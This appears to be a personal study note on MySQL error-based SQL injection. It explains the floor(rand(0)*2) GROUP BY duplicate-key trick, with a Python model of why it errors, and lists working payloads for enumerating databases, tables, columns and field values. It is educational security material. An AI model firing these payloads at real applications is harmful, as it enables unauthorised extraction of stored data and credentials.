Error-based SQL injection in MySQL: the manual error injection method

I used to think there was such a long list of error-based injection payloads, and so many functions such as concat() and rand(), that they were inconvenient to memorize and use, and I never studied them carefully. This time I studied them for a while, read some summaries written by experienced people, and gained some experience, which I record here for later consolidation and review.

 

Generally speaking, error-based injection is a formulaic injection method. It is mainly used when the page has no display position that would show query results, but the application does print database error messages, for example with echo mysql_error();.

The formula is as follows:

and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

We can actually see the outline of an ordinary injection in this statement. The version() in the fifth select clause gives the version of the database; the information_schema.tables that follows it is MySQL's system table holding the table information we want (the outermost information_schema.tables only has to supply rows for the group by); and the limit attached to the third select clause controls which record of the queried table is returned, so the database can be traversed one record at a time.

It should be noted that when we use limit by hand in ordinary injection, we write limit 0,1; limit 1,2; limit 2,3 ... to walk through the entries of the database one by one.

Here, however, the traversal has to be adjusted to the form limit 0,1; limit 1,1; limit 2,1 ...: the inner select is used as a single value, so the second argument (the row count) must stay 1 and only the offset advances; if the subquery returned more than one row, MySQL would report "Subquery returns more than 1 row" instead of the error we want.
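To see why the formula produces an error at all, here is an added Python model (not from the original post or its references) of how MySQL evaluates a GROUP BY key that calls rand(0). The RNG reproduces MySQL's seed_random()/my_rnd() as I read the server source (an assumption, only seed 0 is exercised), the temp-table handling is a simplified model, and the function names are my own.

```python
import math

# MySQL's rand() state is kept in two 30-bit values; this is the server's
# max_value constant (assumed from my_rnd() in the server source).
MAX_VALUE = 0x3FFFFFFF


def mysql_rand(seed: int):
    """Generator reproducing MySQL RAND(seed): the sequence is fixed for a
    fixed seed, which is what makes the payload deterministic."""
    seed1 = (seed * 0x10001 + 55555555) & MAX_VALUE   # seed_random(), assumed
    seed2 = (seed * 0x10000001) & MAX_VALUE            # seed_random(), assumed
    while True:
        seed1 = (seed1 * 3 + seed2) % MAX_VALUE
        seed2 = (seed1 + seed2 + 33) % MAX_VALUE
        yield seed1 / MAX_VALUE


def floor_rand_times_2(seed: int = 0, n: int = 6) -> list:
    """The first n values of floor(rand(seed)*2), i.e. the group keys used."""
    rng = mysql_rand(seed)
    return [math.floor(next(rng) * 2) for _ in range(n)]


def group_by_with_rand(rows: int, data: str, seed: int = 0):
    """Model of grouping over a temp table whose key expression calls rand().

    MySQL evaluates the key once to look the group up and, on a miss, once
    more when it inserts the new group row.  Because rand() advances between
    the two evaluations, the inserted key can equal a key already present,
    and the server then fails with a duplicate-key error whose text contains
    the key, i.e. the data concatenated into it.  Returns that error text, or
    None when the grouping completes."""
    rng = mysql_rand(seed)

    def key() -> str:
        return f"{data}{math.floor(next(rng) * 2)}"

    groups: dict = {}
    for _ in range(rows):
        probe = key()
        if probe in groups:          # hit: count(*) for the group grows
            groups[probe] += 1
            continue
        inserted = key()             # miss: key re-evaluated on insert
        if inserted in groups:       # collision with an earlier group
            return f"Duplicate entry '{inserted}' for key 'group_key'"
        groups[inserted] = 1
    return None
```

With seed 0 the keys run 0,1,1,0,1,1..., so the collision appears on the third row; the outer `from information_schema.tables` is there only to guarantee at least that many rows.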

 

After figuring out the formula of the statement, the rest of the injection process is very similar to our ordinary injection. We only need to adjust the structure corresponding to the statement:

The summary is as follows:

1. Enumerating databases:

and(select 1 from(select count(*),concat((select (select (select concat(0x7e,schema_name,0x7e))) from information_schema.schemata limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

 

2. Enumerating tables:

and(select 1 from(select count(*),concat((select (select (select concat(0x7e,table_name,0x7e))) from information_schema.tables where table_schema=<hex of the database name> limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

 

3. Enumerating column names:

and(select 1 from(select count(*),concat((select (select (select concat(0x7e,column_name,0x7e))) from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

(Here 0x7365637572697479 and 0x7573657273 are the hex encodings of the database name security and the table name users; hex literals avoid the need for quotes.)

 

4. Enumerating field values:

and(select 1 from(select count(*),concat((select (select (select concat(0x7e,<column name>,0x7e))) from <database name>.<table name> limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

To sum up, this is a fixed set of formulas; once they are in hand, the injection proceeds in the same way as ordinary injection.

 

Reference articles:

http://www.jianshu.com/p/8c2343705100

https://www.waitalone.cn/mysql-error-based-injection.html
